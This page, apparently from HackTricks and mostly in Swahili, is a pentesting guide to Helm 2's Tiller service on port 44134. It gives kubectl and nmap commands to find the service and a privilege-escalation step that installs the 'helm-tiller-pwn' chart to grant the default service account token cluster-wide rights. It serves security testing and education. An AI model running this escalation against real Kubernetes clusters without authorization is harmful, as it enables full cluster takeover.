hacktricks/network-services-pentesting/44134-pentesting-tiller-helm.md

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

{% endhint %}

Basic Information

Helm ni meneja wa pakiti kwa Kubernetes. Inaruhusu kufunga faili za YAML na kuzisambaza katika hifadhi za umma na za kibinafsi. Pakiti hizi zinaitwa Helm Charts. Tiller ni huduma inayoendesha kwa chaguo-msingi katika bandari 44134 ikitoa huduma hiyo.

Bandari ya chaguo-msingi: 44134

PORT      STATE SERVICE VERSION
44134/tcp open  unknown

Enumeration

Ikiwa unaweza kuorodhesha pods na/au huduma za majimbo tofauti, orodhesha hizo na tafuta zile zenye "tiller" katika jina lao:

kubectl get pods | grep -i "tiller"
kubectl get services | grep -i "tiller"
kubectl get pods -n kube-system | grep -i "tiller"
kubectl get services -n kube-system | grep -i "tiller"
kubectl get pods -n <namespace> | grep -i "tiller"
kubectl get services -n <namespace> | grep -i "tiller"

Mifano:

kubectl get pods -n kube-system
NAME                                       READY   STATUS             RESTARTS   AGE
kube-scheduler-controlplane                1/1     Running            0          35m
tiller-deploy-56b574c76d-l265z             1/1     Running            0          35m

kubectl get services -n kube-system
NAME            TYPE        CLUSTER-IP     EXTERNAL-IP   PORT(S)                  AGE
kube-dns        ClusterIP   10.96.0.10     <none>        53/UDP,53/TCP,9153/TCP   35m
tiller-deploy   ClusterIP   10.98.57.159   <none>        44134/TCP                35m

Unaweza pia kujaribu kupata huduma hii ikifanya kazi ukikagua bandari 44134:

sudo nmap -sS -p 44134 <IP>

Mara tu umepata, unaweza kuwasiliana nayo kwa kupakua programu ya mteja helm. Unaweza kutumia zana kama homebrew, au angalia ukurasa rasmi wa toleo. Kwa maelezo zaidi, au kwa chaguzi nyingine, angalia mwongozo wa usakinishaji.

Kisha, unaweza kuorodhesha huduma:

helm --host tiller-deploy.kube-system:44134 version

Privilege Escalation

Kwa default Helm2 ilifungwa katika namespace kube-system ikiwa na mamlaka ya juu, hivyo ikiwa utapata huduma hiyo na una ufikiaji wake, hii inaweza kukuruhusu kuinua mamlaka.

Unachohitaji kufanya ni kufunga kifurushi kama hiki: https://github.com/Ruil1n/helm-tiller-pwn ambacho kitatoa ufikiaji wa token ya huduma ya default kwa kila kitu katika klasta nzima.

git clone https://github.com/Ruil1n/helm-tiller-pwn
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn
/pwnchart

Katika http://rui0.cn/archives/1573 una maelezo ya shambulio, lakini kimsingi, ukisoma faili clusterrole.yaml na clusterrolebinding.yaml ndani ya helm-tiller-pwn/pwnchart/templates/ unaweza kuona jinsi haki zote zinavyotolewa kwa token ya kawaida.

{% hint style="success" %} Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

{% endhint %}